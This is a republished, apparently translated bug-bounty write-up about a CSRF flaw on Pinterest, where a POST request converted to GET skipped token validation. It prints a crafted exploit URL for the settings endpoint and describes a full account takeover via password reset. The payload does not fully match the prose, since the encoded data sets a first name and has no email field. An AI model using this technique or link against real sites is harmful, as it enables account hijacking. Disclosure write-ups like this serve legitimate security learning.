Shulou(Shulou.com)05/31 Report--

In this issue, Xiaobian will bring you about how to discover Pinterest arbitrary account hijacking vulnerabilities. The article is rich in content and analyzed and described from a professional perspective. After reading this article, I hope you can gain something.

The following is an account hijacking vulnerability on Pinterest, an American photo social networking site. The main reason for the vulnerability is that it can construct a cross-site request forgery (CSRF) attack to change the mailbox ID and username of any user to achieve account hijacking. For Pinterest, which has 250 million monthly active users, the vulnerability is very serious. The vulnerability disclosure in this article has been officially allowed by Pinterest, and the accounts mentioned are only test accounts.

Pinterest is a popular photo social networking site in the United States. Pinterest can be called a photo version of Twitter. Netizens can save pictures of interest in Pinterest, and other netizens can follow or forward pictures.

Cause of vulnerability

When I was browsing the "https://www.pinterest.com" main site, I happened to find that the CSRF token (token) was transmitted through the http header "X-CSRFToken". In order to verify the application implementation mechanism of CSRF token, I constructed the following request in BurpSuite to change some settings of the user.

POST /_ngjs/resource/UserSettingsResource/update/ HTTP/1.1Host: www.pinterest.comContent-Type: application/x-www-form-urlencodedX-CSRFToken: ……..……..

First of all, in the above POST request, I tried to remove the "X-CSRFToken" header and forward it, and the response error returned was: "/resource/UserSettingsResource/update/didn't finish after 8 seconds", which means that CSRF token may be being verified in this way.

Next, I changed the POST request to a GET request, and still removed the "X-CSRFToken" header and forwarded it out. This time, the response returned was a valid "200 ok".

It is clear that CSRF tokens are not validated by Pinterest servers when POST requests are converted to GET. Moreover, after testing, I found that there are CSRF vulnerabilities in multiple servers of Pinterest applications.

Account hijacking

Since this is a CSRF-based GET request, based on the various server-side elements of Pinterest, all we have to do is construct a link similar to the following, which can be conveniently constructed with the "change request method" option in BurpSuite.

"https://www.pinterest.com/_ngjs/resource/UserSettingsResource/update/? source_url=%2Fsettings%2F&data=%7B%22options%22%3A%7B%22impressum_url%22%3Anull%2C%22last_name%22%3A%22dummy%22%2C%22custom_gender%22%3Anull%2C%22locale%22%3A%22en-US%22%2C%22has_password%22%3Atrue%2C%22email_settings%22%3A%22Everything+%28except+emails+you%27ve+turned+off%29%22%2C%22news_settings%22%3A%22Activity+from+other+people+on+Pinterest%22%2C%22id%22%3A%22%22%2C%22is_write_banned%22%3Afalse%2C%22first_name%22%3A%22dummyuser%22%2C%22push_settings%22%3A%22Everything+%28except+push+you%27ve+turned+off%29%22%2C%22personalize_from_offsite_browsing%22%3Atrue%2C%22facebook_timeline_enabled%22%3Afalse%2C%22email_changing_to%22%3Anull%2C%22personalize_nux_from_offsite_browsing%22%3Afalse%2C%22is_tastemaker%22%3Afalse%2C%22type%22%3A%22user_settings%22%2C%22%22%2C%22website_url%22%3A%22%22%2C%22location%22%3A%22%22%2C%22%22%2C%22pfy_preference%22%3Atrue%2C%22facebook_publish_stream_enabled%22%3Afalse%2C%22email_bounced%22%3Afalse%2C%22is_partner%22%3Anull%2C%22ads_customize_from_conversion%22%3Atrue%2C%22additional_website_urls%22%3A%5B%5D%2C%22about%22%3A%22test%22%2C%22gender%22%3A%22male%22%2C%22age%22%3Anull%2C%22exclude_from_search%22%3Afalse%2C%22birthdate%22%3Anull%2C%22show_impressum%22%3Afalse%2C%22email_biz_settings%22%3A%22Everything+%28includes+announcements%2C+expert+tips%2C+creative+ideas%2C+and+more%29%22%2C%22country%22%3A%22IN%22%2C%22hide_from_news%22%3Afalse%2C%22collaborative_boards%22%3A%5B%5D%7D%2C%22context%22%3A%7B%7D%7D"

Any Pinterest user clicking on the link above will have their username and registered email changed to "dummyuser" and "anytestemail@user.com" respectively, although anytestemail@user.com is a legitimate email I control.

After the above attack worked, I went to the following Pinterest password reset link:

https://www.pinterest.com/password/reset/

Then, I log in to this anytestemail@user.com mailbox I control, get the user password reset link sent to me by Pinterest, reset the password, and then I can log in to the victim account with dummyuser username and new password, perfect hijacking.

The above is how to discover Pinterest arbitrary account hijacking vulnerability shared by Xiaobian for everyone. If there is a similar doubt, please refer to the above analysis for understanding. If you want to know more about it, please pay attention to the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.